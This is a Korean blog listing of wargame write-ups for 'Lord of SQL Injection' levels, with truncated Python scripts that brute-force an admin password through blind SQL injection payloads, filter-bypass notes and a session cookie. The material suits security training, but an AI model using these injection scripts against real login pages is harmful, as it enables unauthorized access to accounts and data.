webhacking/load of sql injection
-
[load of sql injection] assassinwebhacking/load of sql injection 2018. 11. 17. 06:40
for문으로 브루트포싱때리면 풀린다.for문 10개 돌리려다가 그러기엔 많은 횟수라 2개로 admin하고 곂치는 값을 찾았다.import requests url = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"list1 = []cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' } for a in range(ord('0'),ord('4')): for b in range(ord('0'),ord('4')): text_main="".join(list1) text = "%"+text_main+chr(a)+chr(b)+"%" params = { 'pw' : text} res = r..
-
-
[load of sql injection] bugbearwebhacking/load of sql injection 2018. 11. 17. 05:19
mid( 문자열, 인덱스(1부터 시작), 가져올 값),substr(동일)ascii() 아스키 값 1개 반환import requests url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php"list1 = [] cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' } for o in range(0,4): for i in range(1,10): ## 패스워드 길이 찾기 text = "4" text1 = "4||length(pw)
-
[load of sql injection] darkknightwebhacking/load of sql injection 2018. 11. 17. 02:12
Solve code:싱글 쿼터문자가 필터된다. 하지만 더블 쿼터는 필터되지 않는다.import requests url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"list1 = [] cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' } for o in range(0,100): for i in range(1,10): ## 패스워드 길이 찾기 text = "4" text1 = "4 || length(pw) < "+str(i)+" && length(no) < "+str(o) params = { 'pw' : text, 'no' : text1} res = requests...
-
[load of sql injection] golemwebhacking/load of sql injection 2018. 11. 17. 01:47
Solve code:import requests url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"list1 = [] cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' } for i in range(1,100): ## 패스워드 길이 찾기 text = "1' || length(pw) < "+str(i)+" -- " params = { 'pw' : text} res = requests.get( url, params = params, cookies = cookies ) if( 'Hello admin' in res.text ): print(res.text) break for j..